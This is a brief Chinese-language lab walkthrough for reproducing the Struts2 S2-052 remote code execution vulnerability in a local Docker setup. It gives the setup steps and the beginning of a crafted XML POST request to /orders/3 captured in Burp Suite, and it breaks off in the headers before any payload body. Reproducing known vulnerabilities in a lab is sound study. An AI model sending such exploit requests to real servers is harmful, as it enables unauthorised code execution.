复现S2-052远程代码执行漏洞

1.启动环境 docker-compose up -d

2.查找Ubuntu ip

3.burpsuite进行抓包 

 4.

1. 发送以下数据包

POST /orders/3 HTTP/1.1

Host: 192.168.81.168:8080

Content-Length: 2419

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://192.168.81.168:8080

Content-Type: application/xml

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,ap